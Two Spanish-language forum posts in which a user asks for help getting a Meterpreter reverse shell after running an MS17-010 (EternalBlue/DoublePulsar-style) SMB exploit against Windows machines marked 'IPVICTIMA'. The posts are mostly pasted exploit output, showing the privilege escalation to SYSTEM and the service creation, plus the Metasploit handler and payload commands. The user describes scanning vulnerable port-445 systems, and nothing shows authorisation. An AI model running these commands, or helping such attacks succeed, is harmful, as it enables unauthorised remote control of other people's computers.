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1  Seguridad Informática / Bugs y Exploits / auditando en windows pero no me llega la session meterpreter en: 23 Agosto 2018, 09:22 am
hola queria saber por que no me llega la conexion meterpreter estoy auditando un sistema windows crea el file txt osea es vulnerable pero no me llega la session meterpreter algunos saven por que es?

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017afe0098
InParam: 0xffffc00179f1216c
MID: 0x1403
unexpected alignment, diff: 0x10cd098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df92098
InParam: 0xffffc0017afe616c
MID: 0x1503
unexpected alignment, diff: 0x2fab098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df9e098
InParam: 0xffffc0017df9816c
MID: 0x1503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target <----------------VES QUE SE CREA OSEA ES VULNERABLE!!

hay se creo el payload pero no me llega  la conexion al meterpreter sigue igual

Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e2e6098
InParam: 0xffffc0017e19b16c
MID: 0x2c03
unexpected alignment, diff: 0x14a098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e376098
InParam: 0xffffc0017e2f616c
MID: 0x2d03
unexpected alignment, diff: 0x7f098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017ee5f098
InParam: 0xffffc0017e37c16c
MID: 0x2d03
unexpected alignment, diff: 0xae2098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017eef4098
InParam: 0xffffc0017eeee16c
MID: 0x2d03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Creating service zRZy.....
Starting service zRZy.....
The NETBIOS connection with the remote host timed out.
Removing service zRZy.....
ServiceExec Error on: IPVICTIMA

y esta es mi conexion en metasploit:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST MI IP LOCAL
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on MI IP LOCAL:4444

alguna ayuda porfavor!!

2  Seguridad Informática / Bugs y Exploits / problema con wine32 en: 21 Agosto 2018, 05:04 am
buenas nose si esto esta bien publicarlo en este lugar les queria comentar que tengo sistema vulnerables con el puerto 445 pero no me conecta y al scannear son vulnerables pero cuando configuro todo bien en metasploit me aparece esto ya intente muchas veces desintalar y volver a instalar wine pero sigue igual el error alguno que le aya pasado lo mismo con wine32

msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

  • Started reverse TCP handler on MIIPLOCAL:4444
  • IPVICTIMA:445 - Generating Eternalblue XML data
  • IPVICTIMA:445 - Generating Doublepulsar XML data
  • IPVICTIMA:445 - Generating payload DLL for Doublepulsar
  • IPVICTIMA:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
  • IPVICTIMA:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
0014:err:service:process_send_command receiving command result timed out
0029:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
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